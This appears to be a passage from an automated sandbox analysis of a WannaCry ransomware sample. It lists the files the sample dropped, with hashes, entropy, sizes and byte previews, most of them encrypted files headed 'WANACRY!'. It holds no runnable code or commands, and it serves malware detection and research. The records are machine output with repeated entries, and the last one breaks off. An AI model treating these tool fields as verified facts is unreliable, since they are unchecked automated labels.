                                                                                      SSDEEP:24:bkhOkWRRPWAq+Qbi8JBEGnrEMggTcICmeUPRDOqL2zw3o+NbgfPQpCcrQer3d2k/:bk6ROU+Qnec/0PAhw3o+NbUOt2kTo1a
                                                                                      MD5:804127BB2CD7F1A590469343DDE119D2
                                                                                      SHA1:B2EF97282FA49E4B9C0221CF024E14828531F3C6
                                                                                      SHA-256:583C5FCBB1211EA7F4AACB9ACCED4EC7411DEAD84EE15C45FE30E9D85548CE2E
                                                                                      SHA-512:601DB8291A302CD445BFCE1983A4676C93C3B27FD6FE93CCA692BE79FBCA6A5C361C18138C01FF07F322F0B98E5190C3B548484FB11A99ED961047A5BA2AB4F9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......3y+t...Y.!N..%..~...._.`^.=...V.......m"..C...v7..(oHJekOWL..c.k.......v1.u.F"..awz.L..$lNz.]...}[.h.q.V.C.{..{^.k].^M.R..[ .+.U.S...k.A...C..J...K..]+.C.......A.DN...........-t.p.....:!..".p71...^2.DS#(~....&..]0v.6.a5ck.#.X.....w.ET.&....3[..............&.....9.cS.i.x_6.,.3<...........g.|.X=.BU...s>..N..o.*.....f..j=.p..5.lGH.^B.CG...[J...ne.......>.-.V".!...}.:."U.=.x%e.a.,.0,u....{.G$..d.i......=(L...o+1.~..x$Dd..JP_........;..f.........n....)......(=t.g@...q...8{../...WH..#..*.M-.k..Z....q#.......$...l.......+....T..(...33x.}h..+.....F.gzcQ...5=M.!...V..'...}...m....'.r.E4hkiB..\A.d..jm3.{.eO......y.l.in..?.a.....L.y.&u.3.I......v..~e.G...*..Q.. 4...m..@.....|....|[&v.....l...N.5....-.O.F;..=g.....M[4c9....m......9..#.tD,.\S9....W<...#.....<.%~..}....\.O.@X..r....IT.....5Q.<V.=........~CL...$.T.....C.:...S.*#...7<.u......Y..T......2.....z... e-.0....b....^.X....OX.d...n.%a~.]....K....0&.m}^...AT..o1n...e..%.o...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.81411086634184
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:j+s/tHwE+QNw56ZkQx8kNf6n+oVUsVof7894zQlucss:ntHwEFNj8p+oVUsGz84Fbs
                                                                                      MD5:8FE4444A5F39F5BD4D8BCC933E7394B3
                                                                                      SHA1:DF9981793EC8F9F26FA1E810AE832B2136955FF2
                                                                                      SHA-256:764B1B76C671A86076090236F45452EFE13B45E4630104EDCF6FBBF7B0D4F3A3
                                                                                      SHA-512:1EC55EC28E283A406A4AD520B6EC6A57241D9ED53ABDFA72CB7C5FD2F994D89C2FF9E98C1839C79207DD702A74094842F4163168E0BAFCB9770D16FB08A4D28A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:....V..-p.....1n.:.B.!v..@..^...+..Iq.....#..H.TD...d.....+d?E.....O..v.MT..8....At......b......Z..E.....96..g..%..........].x.H.........yw..|.J.o|...6-.^4I ...:..b....6x=..U.K.Mr9...C...l.T9..b......eWZ...>0B..X...a.&9#8,$..V4.."...t.3...6.{.=....ow...^..2.K\.b.[....3.p.......Q.pt.(.7.mc...?XH....z.5.\....4..H....w.F......:78.a.pxU..'?ke..c..*m}...(.......V.wp........u*.......N...-.D$;...j*..1u...X..`..;c/..n...>:..ow....f.... 4D......[d..n...KL...y.c.._.m...{M...]........0...zj..E4..c...On.bQ7....0G.O...%....#.*O(r..t.Bd\e/.=.......`;..h.....}lz..n...R/.c...r...2H..,...xx}.k;.c..N9.A.r^..X\.%..t.f.<......u...7.....C.I.a.`......3J...........qB..y...4vr..._.v...yU..b.h.Us..)(.....X.O.B..r<`..C............c..w.....~BX...=..4.+4....y.yi.. r.d...5F.....Y[`..!(...IH.....t...hE...f/..o.2..v..$.....V.:L.iO.T3.s..j..I f7.z...r..z......s.4~..5..........Y...X..f*...f....;...EE.81...i.......o.v...{...+..x.....U.....k.]`%..Y.A+.}x.o~.dJ.:......D.{
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.835465315044472
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkZEj6sZZCy6bs3cMNtwEiqk/EuKebMnsxbUy6aYdqJHyoAaLwNRl3:bk2j6Pw3/tQf/ErYmoUyIWTLWRl3
                                                                                      MD5:5FA6925BB40275F2464683FF84937ADA
                                                                                      SHA1:BA2FEB468F45A337DBFC8B9C4EF2E43854968F08
                                                                                      SHA-256:E4F492D822A996203BA402230931A0B3E04D032B9364937639E66EBC3187DE28
                                                                                      SHA-512:D52E4F02C3E5B0FDA6552DA916DC176DAC5E32FE97E9E11A9BE33E74CE9AA33B4D8E62B7E703CC913182894846E8F12A158A225BE4A8BCF831033D151B50D48B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........I-.h....~..... H.9..:z..*...m......c..y.d.e..Z.D..7.Q"N.}..&...?..u.d.#.Fw..P.z......4`...._..nl..... .nn.W....`.l....Ct+...h_..t........v.k..~..O...j.XW.~k.W.K...;..Hj...W.......L...Un.w.\.....7..F0..F..8<........d..a...Sk.H.t..4v.THN.<.k................`...K.Jx#hY.=~..>....:S......b...x@..;.&p.\w..].v3.M......'~....3^.M.|.z...0B..7...0.p..0...e.c.#E.j.8.m..@V.Z._.b...i...Je......>.........6<>f.Z.....>.N0......-.._..o...4.Cq..T..v....ibm.i.V.a...C.y..i..p..ks.).......GZF.ia.M.X...6...&..\..S...;..&..Q...PEy.e....K........ .....E...m..k<..'..D.....P...+UP.......#{b_.....uE..]....o..@..I..........#.Q..e[..v..T|.i...j]S..Pq...P.IvI.*.@m.N..9<.A.O.L...|..5...hx..o.9c...lyV...$.v...Q....d.C..;7..-.N......7>..X.......c.[4.\..9...|....!.&...H.G~g.3.3u......M.YV.n4.x...@.5I.L8..<./....q.......G.G;-....^.*..].IT.../..oP...p..d).9..._.I..Pc.:.G.B.......!%.W......eSJ.o.i.............Lb....2.........N..kr...X>..$..C...5XYg..K-EI...Y
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.835465315044472
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkZEj6sZZCy6bs3cMNtwEiqk/EuKebMnsxbUy6aYdqJHyoAaLwNRl3:bk2j6Pw3/tQf/ErYmoUyIWTLWRl3
                                                                                      MD5:5FA6925BB40275F2464683FF84937ADA
                                                                                      SHA1:BA2FEB468F45A337DBFC8B9C4EF2E43854968F08
                                                                                      SHA-256:E4F492D822A996203BA402230931A0B3E04D032B9364937639E66EBC3187DE28
                                                                                      SHA-512:D52E4F02C3E5B0FDA6552DA916DC176DAC5E32FE97E9E11A9BE33E74CE9AA33B4D8E62B7E703CC913182894846E8F12A158A225BE4A8BCF831033D151B50D48B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........I-.h....~..... H.9..:z..*...m......c..y.d.e..Z.D..7.Q"N.}..&...?..u.d.#.Fw..P.z......4`...._..nl..... .nn.W....`.l....Ct+...h_..t........v.k..~..O...j.XW.~k.W.K...;..Hj...W.......L...Un.w.\.....7..F0..F..8<........d..a...Sk.H.t..4v.THN.<.k................`...K.Jx#hY.=~..>....:S......b...x@..;.&p.\w..].v3.M......'~....3^.M.|.z...0B..7...0.p..0...e.c.#E.j.8.m..@V.Z._.b...i...Je......>.........6<>f.Z.....>.N0......-.._..o...4.Cq..T..v....ibm.i.V.a...C.y..i..p..ks.).......GZF.ia.M.X...6...&..\..S...;..&..Q...PEy.e....K........ .....E...m..k<..'..D.....P...+UP.......#{b_.....uE..]....o..@..I..........#.Q..e[..v..T|.i...j]S..Pq...P.IvI.*.@m.N..9<.A.O.L...|..5...hx..o.9c...lyV...$.v...Q....d.C..;7..-.N......7>..X.......c.[4.\..9...|....!.&...H.G~g.3.3u......M.YV.n4.x...@.5I.L8..<./....q.......G.G;-....^.*..].IT.../..oP...p..d).9..._.I..Pc.:.G.B.......!%.W......eSJ.o.i.............Lb....2.........N..kr...X>..$..C...5XYg..K-EI...Y
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.830965693114331
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:arEpk7/T1yEFxj6EkBGuNqgwiLM1eX209lNJgwWj7eCXD/bp/P:aYpk7r1yEFxj6Ek0TOMkm8l1WFDF3
                                                                                      MD5:9D840553F652859B4738EBA4D5DDCECB
                                                                                      SHA1:A36272916C893BB95A26BDC37863D91939C7ECDA
                                                                                      SHA-256:C4182400E00C75D186E3815FF69A278946B7B3391495144B21A10F031199A850
                                                                                      SHA-512:6C0C51A5F74F824104911332F62BB6AA2FD459C4B4FB48E853838A9F9BDD42A4E6CE2C09F70F9ACD0EFA29A7B07609C1DF6A5A56FE1E1E28E9C57C398CF3E76E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...]{.I....8p..j.......H..(bi]....2./N.);.d.C.N..r..6...QL.,x..{..WC.x.!Mw._..&=v..2ms.."G6..8..Zd.2z..l..1@.3{.#...g....Hn..t..Y.R-...x..R...xpy...&D..(nf%.....U...iT9n..gH...e.0IsA..^...$...._.Pm.8..w.IIe..EL.k.%.".........G^..'.q.U.....W..K.:.1%....)...h.....!.F...+..n..^aj.P...j._...M...r$9(.N..1...G.[Aw(.Y...l..-..|.]Q.+.....z..?h#Xn...'~...l~.p...!.0!..`.....)KeWk.t...$...9..Ut.n..X........gd.3..H.y@"j.....I...n*.....U.u......c].[..V.n.0.a.A.O..`)f.;.. ....I.)aT......R!....F..W.`...A]...!....;LW..c....[...-d...JiH.....+.C.'(&...Z`.l.m\....{%yq..X..w.@.-. ...-...Ue.(G.)..!...6.@A.....!.*~....=|...G..........:?....=_.....~hn....2..T..iaX~.u.0E....'.......5....<...+....E.lU...Fs..O y./.h.u..8G...d.A...l.w.d..i....+'.(e... .E..}...6.t.%.au...Uj..h.....=.....D.3<.....[j.3rV!..Pz..[.!.u.6..",!.F(...G..0Y..r....O.NI....>....T..4.$By.|..E.E..TG.z.'.j.5.a..).Q.4c..C.p.W#...:..9..b..`..f. ......2.,....s............f.O.[.!.P^..{....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861295110158101
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk2hRDJ5Ot8c9nGXPRPfaizqly41GObpHDHdRR2L2zlIOMGDuDZrJ:bkWpJ5+RE5PCguy41Ggp5RkL2cGEZrJ
                                                                                      MD5:63A3B35D9540A31CCB333E12F9636E77
                                                                                      SHA1:3FACF5927C299AB660E3471EF1124A4D4DAF667D
                                                                                      SHA-256:348A613B95CA6BFC7DBB99A21DFA8303F3E58CC80EDF5F6850147E4F9245D063
                                                                                      SHA-512:290D25ED6868D22C70EB9495D62A3645D839F89F3F8D0A223DFD3AEDCBF16655EB77A8C0053C4DA96747488271CC0288AE8B1BB1AFBBDEA9B2952A1FCD1ECF86
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......).LQ"@.K..........h...3....[y..DdYq..g/.w.....;.6..y......r..<.<-l...5....m...C....3.(...95..XE....X(.E.'.6...M....U.S...........e.s......+./K`........e..CB....A.9.j..13..D..oS..u.%...n.h.W.t.^.Xv.....}Z...z7)V...K.'I.b..._..F.................>.T.(.:......&Z.7...Q.kppo&..:bS.....l..K. I.rBC.c(....R..+.5....1......\.....J......Qb..n.Z.mAD...P.p..L.....O}..NH..j.....G.0.<..pU.S.HPw\......c..]...J..]E.....1.6.7....G.4..Z...6..<r.g......;[..S..P.Q.f%..'.CD@.\ff.7|.W..Q....v.t^M...LF.YK.y.:..T..G*.......hWS@-.....:S...c......q....7.'....]e.3;ec...Pg..........Y!....Q..j..4_.,..8....g.Q7....{... s.1]..d@...'..!......w...i#.........z......."......%v."..=....A....LD1p.v.E......7...9.....r...6. ....|.4x)..^..*%g......&.I.f...#.>..h..7..@.t~..D..A.4......S.]d...T? G..9...3..b..j........,GQ|..vUp..4....r.Y.......&..n.P.Y....$.o.-&....5.'.j++LTE ..c....3RX"i8-t....E7R......x....9.G....SP..5..k..9m{i.q`X"..|.h:..7.#x$_H..dt{..2.F
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861295110158101
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk2hRDJ5Ot8c9nGXPRPfaizqly41GObpHDHdRR2L2zlIOMGDuDZrJ:bkWpJ5+RE5PCguy41Ggp5RkL2cGEZrJ
                                                                                      MD5:63A3B35D9540A31CCB333E12F9636E77
                                                                                      SHA1:3FACF5927C299AB660E3471EF1124A4D4DAF667D
                                                                                      SHA-256:348A613B95CA6BFC7DBB99A21DFA8303F3E58CC80EDF5F6850147E4F9245D063
                                                                                      SHA-512:290D25ED6868D22C70EB9495D62A3645D839F89F3F8D0A223DFD3AEDCBF16655EB77A8C0053C4DA96747488271CC0288AE8B1BB1AFBBDEA9B2952A1FCD1ECF86
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......).LQ"@.K..........h...3....[y..DdYq..g/.w.....;.6..y......r..<.<-l...5....m...C....3.(...95..XE....X(.E.'.6...M....U.S...........e.s......+./K`........e..CB....A.9.j..13..D..oS..u.%...n.h.W.t.^.Xv.....}Z...z7)V...K.'I.b..._..F.................>.T.(.:......&Z.7...Q.kppo&..:bS.....l..K. I.rBC.c(....R..+.5....1......\.....J......Qb..n.Z.mAD...P.p..L.....O}..NH..j.....G.0.<..pU.S.HPw\......c..]...J..]E.....1.6.7....G.4..Z...6..<r.g......;[..S..P.Q.f%..'.CD@.\ff.7|.W..Q....v.t^M...LF.YK.y.:..T..G*.......hWS@-.....:S...c......q....7.'....]e.3;ec...Pg..........Y!....Q..j..4_.,..8....g.Q7....{... s.1]..d@...'..!......w...i#.........z......."......%v."..=....A....LD1p.v.E......7...9.....r...6. ....|.4x)..^..*%g......&.I.f...#.>..h..7..@.t~..D..A.4......S.]d...T? G..9...3..b..j........,GQ|..vUp..4....r.Y.......&..n.P.Y....$.o.-&....5.'.j++LTE ..c....3RX"i8-t....E7R......x....9.G....SP..5..k..9m{i.q`X"..|.h:..7.#x$_H..dt{..2.F
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.827171585958686
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:8x6wkG2VBSFATeBz2fATxY1mmIoqovTriB1RWGAt3qqpCSe:su/eF3Ta1mboqEriB1kGE3qaCF
                                                                                      MD5:82AA94B08054AEB3285EEC0D18CD4C4B
                                                                                      SHA1:82F147F512DAF1AB211B94DCE7EF746D18AC6DA4
                                                                                      SHA-256:4BC28206CAFC7D07DB7E136281944A60C7C2F3F594FE4028D3E4C3BEAEE2E2FD
                                                                                      SHA-512:1642992E9B897E3F441802BC293F72221F6E3465BD65AF869953832E5A2DF77B84044AE6F212DE773B655F764FA3EC8B892F5295F08C4C7C9779490BADD5D85E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.`.Bn.4...6O...g......(........x.^...d:o.Y._.4....x.h....98.6..CD.G.-4.*h.3....x..[....Y.U{.k........O.M.1...D.K..i.~..G.D..!.....&......T.n........(9......g~c,.*#Iu....h...PH.....;.......n8.[\..Y.V..2GA.3I.e..g.e...0/X..o..[f....yBt.n?..m..V.[J|.q..h......{J....0..#h....i.H....,..r.8..iA...z...eO...A..`_...o.*..Qv..Y.....S.....\.`,.....z.=r:.....j.G....lUe,L.......p...^w.hUl.W......Vg.C_....t...".2..c.%.*..B.i,w.L.3b.....(..._.Q..nQ{.B.1.Y...Q.]....CC..l+`a.(....7J..@W..........T{..J<[..0.....'!.........d..RG8=4....!HZh......7.....[c....o!...&w. ........P.>..$..u..!a..g4..n.......'.......5....e........#......f>$s!MZ`.+.K-.......-.o.4...]...9..)S69B..V..Rb .U&FV.^..Q..... ....j..^W...h.Kr...K.E.3.'=..ko.!H.7S...1..YC...X.W.2...............;@.E...j<...I.G...e..n.})..)...0...(.)$..N...t.m1. ......B...h..+t./S..hgFe"{#..[....;.....L....S...).2i9...w...n..N......E5.6.....6z...@.s.....:.@.7....KQz...{.%e.?...+o..j.R.W... ..KJ..[...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.852626636474342
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkiM2dESRtyiOZSII7ofYHWCrhV3joOx9NBiJ7wSkhIvwizHGRV8d1DutiFxdKIi:bkT2Q3hnfQFx9NEJ7RkIgRud1SoFxd2v
                                                                                      MD5:54ACBA99CD4035D213157802B5D4545D
                                                                                      SHA1:9D7F8F47DE2138F4EC47F76449C6E6FA3D9DE071
                                                                                      SHA-256:D490CF39A883704646A6EF865767FC3B7E303FC91C00891E2929015451D35A31
                                                                                      SHA-512:4171F0B85D05BA1EB0B2EA341337F43636E88E04077AC6B3D99B6605D3B485133245399E360E4B0FEEF65441DC3EA7206E415A18EC80E98434C79BCDE59961A9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......=.;.......5...M..>"x\...MoC](...%..h..fu.....E.H...n6.(Bk..c........g.........Ci..f.+c.H../...m.^&.J...6B.... ..[...JR..s..~,....C.$.F!M-EL.....7..cGyZ.h{fIK.....sJu))K./.=.T...k.[..5.Y_.:Y*8~..d6..s ...&.g.+...$F...U.67y~..+..c.Q.4.......>..E...............9c;:1*+.fo.-..d.(Y.E..."=.|....+.r..P..+..t....r..J......3m..#K......%..Q..ee..c+.'"...]6.....|.....%..'.x=A.._.W..F..j..'-u......Sg.......R/..J(.,qN.f3M%..z..>....p.-.......f......".-\./.(..3.<....;z@.......%....[.*.(.P./....S.].e|..'_\..;..@..C.Y:.o._..1,.g?...x..nH@.Q..+3..D.f.&.p.3Q..r).."..t).......Q. ...iZ?&4...eXU.t\....L...._S,..._P..Pu0x..g.Fn*......!s....@......UD....T+.....h....;....x.>...d......#..~....>....;..:oA.X....7..p.l...w.....k....$\w...~.\..q...9M....MO...Wp~...u......n_F.....H.H..e._.....F.5......Y.;..V...%.;.......4`k#!..H...8b."W..J....B.D...0D.N. y.K.....7.......a...3@..Pd......m%.2J..?..i.i.k?.c..x|...*..g.<.i%6'K1..|...Q.Q..#.M...IP..c.W..+...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.852626636474342
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkiM2dESRtyiOZSII7ofYHWCrhV3joOx9NBiJ7wSkhIvwizHGRV8d1DutiFxdKIi:bkT2Q3hnfQFx9NEJ7RkIgRud1SoFxd2v
                                                                                      MD5:54ACBA99CD4035D213157802B5D4545D
                                                                                      SHA1:9D7F8F47DE2138F4EC47F76449C6E6FA3D9DE071
                                                                                      SHA-256:D490CF39A883704646A6EF865767FC3B7E303FC91C00891E2929015451D35A31
                                                                                      SHA-512:4171F0B85D05BA1EB0B2EA341337F43636E88E04077AC6B3D99B6605D3B485133245399E360E4B0FEEF65441DC3EA7206E415A18EC80E98434C79BCDE59961A9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......=.;.......5...M..>"x\...MoC](...%..h..fu.....E.H...n6.(Bk..c........g.........Ci..f.+c.H../...m.^&.J...6B.... ..[...JR..s..~,....C.$.F!M-EL.....7..cGyZ.h{fIK.....sJu))K./.=.T...k.[..5.Y_.:Y*8~..d6..s ...&.g.+...$F...U.67y~..+..c.Q.4.......>..E...............9c;:1*+.fo.-..d.(Y.E..."=.|....+.r..P..+..t....r..J......3m..#K......%..Q..ee..c+.'"...]6.....|.....%..'.x=A.._.W..F..j..'-u......Sg.......R/..J(.,qN.f3M%..z..>....p.-.......f......".-\./.(..3.<....;z@.......%....[.*.(.P./....S.].e|..'_\..;..@..C.Y:.o._..1,.g?...x..nH@.Q..+3..D.f.&.p.3Q..r).."..t).......Q. ...iZ?&4...eXU.t\....L...._S,..._P..Pu0x..g.Fn*......!s....@......UD....T+.....h....;....x.>...d......#..~....>....;..:oA.X....7..p.l...w.....k....$\w...~.\..q...9M....MO...Wp~...u......n_F.....H.H..e._.....F.5......Y.;..V...%.;.......4`k#!..H...8b."W..J....B.D...0D.N. y.K.....7.......a...3@..Pd......m%.2J..?..i.i.k?.c..x|...*..g.<.i%6'K1..|...Q.Q..#.M...IP..c.W..+...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.818570899833059
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:VYVN+RtjS8MDAqJbWBv0A61nvIMBMNWU4jiDe9wh5ALW3JuNn:VMN+SBDAqJbWVm1nv28xjW15AnF
                                                                                      MD5:1B327DB94C118387A0A3D9428FCCA7AC
                                                                                      SHA1:2F858104D4E2D6D83F9E2AE2E3427E40856609A9
                                                                                      SHA-256:06E02C57B1FD9A288D9715153800A246DB77D665A2CD600ECDEC0B6F4687ECCF
                                                                                      SHA-512:BDB498D8D8A51D68CCDF01217B4E8D8577AD72CD31321E465200714F4E6DE1229BF23352C3E025ABA6AB09648370E432F64638D6044C203B3FA449C455BFAD51
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.nc....8...''a.,L.z.D..6......CswJ....g.\.:.E...DNu~...bisf..`..S5..T..EY38.&...#...18..w[.*......?(.?.`..{p6.]~..9G.@.j.._..I.....d.u..!.|%!..Q+....h.2....".d.?.yq*...E...g......:f."!.TGN:..&.9..H.Y..y..\b#..DRPS...........bS......."..x...U...t..(m.....q.....a...3.V....H....mQA.... .U. ..i......q.......I...R...J....#..q.9.u..^n. S..<..%..o..w.$.zX...K.c..h.39..f..Z.!?Te.wI~...."...5F..Y..2%....'.B......z..x...P.....=-....2P|.{..YV.'...@.......B~([..5.....C.S-v.cK.ua..B...X^.u.OL..$...]'..F........&%.0W...BH.).Fk.N...5....6(~<..3.....D.n.3.#...B....|..._hu.d...3y.......@.....Dh.I=..8........[....O.......J.....+!F..jQ..(>;%T|..]....._>...X../;.z..4A&../.u....s..j..w...i...g....5......Y,..(j.B.._.J.....t....]..g..9.ft\wO....]J..\V.h..T.@Vf1.....QR[..(.H../.1.....F.>..v..d...p6...Lo.l...+.HY..&2.R..m.{.....[....Q......>U....&..?~4$<Q.'....M*.Q*cd+C._^.%ehI..$..RX,...O.pU....fa...i....<..G..z[.... ..j;R.....=....;....n#..m..v...N.B.=.V2.s(...."[..y
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.849340973002651
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkIVKI+YyBiesNdFz2zuI/d5gDHd7XmVo3UmRHsL9rMqw38viIqfRH:bkI/1yUcBsDHlXfaZYFIqJH
                                                                                      MD5:0B1D3705A025B63BF4E2B26C5179832D
                                                                                      SHA1:BE1589E89C97B12DEAE2BB78AAE5BE5D8D0CC60E
                                                                                      SHA-256:F9A8DFEE617468F1E9343357520D2BA57C0CEE9F6A2CB6D194DB3490203DF700
                                                                                      SHA-512:A81848C386C1F0D8E4087E2D778664E21919B4364195FB7F33FCF666869038797EE95448A31CFE5DDA3F3F6CBABD37609CB43A0A293CA60BCDC9651788472BBA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....s$. ..D81..p.......]...k........c.c..?.i....>n.5h=3.].a..b..c.f...p.r..h.I.".9.@.....=@G.g....y..2..G.......(..(c.l.Hi.^@....&..Nd:i...?8........ ..:k.c].4#9.l...l....p(;.xp.s.A.y*?.~...+.....GH..0-3|.3....Y...L...)....Q}v.\7|...-.i..9\..............._.dFE..t.....*....._j..[<:...{......t.>[..9..<....@.....B..EYZZ.`.V..E.e...J.m.S.(..qO..L...#I..Ru6o..<o{{.8.b..z\....&q.+09..*cK....$=..7 ..-..T.-9h;.g..Z*...-..7L.YM..r...O::.p..%?.t.S ...GS...Z.,l,.,......~UH../.]...N...Z.9...L..y...(...`...Z...c~1...e!..4"..b..v....LG..i5...'...7.kQ...".."$w...m.o...,......Go...`!(....$..zo{rdP_...-.L.f.r.V..n..U..F.r.... ...>....lN...D.O.K..+)...sGO.....Rmj.......9.h@.J....MS.}eX.n."(.3g$....x.d./y....&......2.7.c...Z1!....-.2js7.H....v.....;.a.....9Q..?.........Q..*....R_..:.c..B..2.V.......O'MM6.+c7.9@......z...<1#-.,.Y.s.(.F.c...+....R.<-.L.S.?.G.rX.~.z.Q....o.Y|m.D...../...`...)8......[?./.0..Ns.........W'.......D...C.....k...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.849340973002651
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkIVKI+YyBiesNdFz2zuI/d5gDHd7XmVo3UmRHsL9rMqw38viIqfRH:bkI/1yUcBsDHlXfaZYFIqJH
                                                                                      MD5:0B1D3705A025B63BF4E2B26C5179832D
                                                                                      SHA1:BE1589E89C97B12DEAE2BB78AAE5BE5D8D0CC60E
                                                                                      SHA-256:F9A8DFEE617468F1E9343357520D2BA57C0CEE9F6A2CB6D194DB3490203DF700
                                                                                      SHA-512:A81848C386C1F0D8E4087E2D778664E21919B4364195FB7F33FCF666869038797EE95448A31CFE5DDA3F3F6CBABD37609CB43A0A293CA60BCDC9651788472BBA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....s$. ..D81..p.......]...k........c.c..?.i....>n.5h=3.].a..b..c.f...p.r..h.I.".9.@.....=@G.g....y..2..G.......(..(c.l.Hi.^@....&..Nd:i...?8........ ..:k.c].4#9.l...l....p(;.xp.s.A.y*?.~...+.....GH..0-3|.3....Y...L...)....Q}v.\7|...-.i..9\..............._.dFE..t.....*....._j..[<:...{......t.>[..9..<....@.....B..EYZZ.`.V..E.e...J.m.S.(..qO..L...#I..Ru6o..<o{{.8.b..z\....&q.+09..*cK....$=..7 ..-..T.-9h;.g..Z*...-..7L.YM..r...O::.p..%?.t.S ...GS...Z.,l,.,......~UH../.]...N...Z.9...L..y...(...`...Z...c~1...e!..4"..b..v....LG..i5...'...7.kQ...".."$w...m.o...,......Go...`!(....$..zo{rdP_...-.L.f.r.V..n..U..F.r.... ...>....lN...D.O.K..+)...sGO.....Rmj.......9.h@.J....MS.}eX.n."(.3g$....x.d./y....&......2.7.c...Z1!....-.2js7.H....v.....;.a.....9Q..?.........Q..*....R_..:.c..B..2.V.......O'MM6.+c7.9@......z...<1#-.,.Y.s.(.F.c...+....R.<-.L.S.?.G.rX.~.z.Q....o.Y|m.D...../...`...)8......[?./.0..Ns.........W'.......D...C.....k...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.804449043721534
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TyNkGZJmCrWit7eQhT9IXhK7fcSVIzn40Y4pqj+jivaN:4JZJmCr5tKuNfcS6k0Yz18
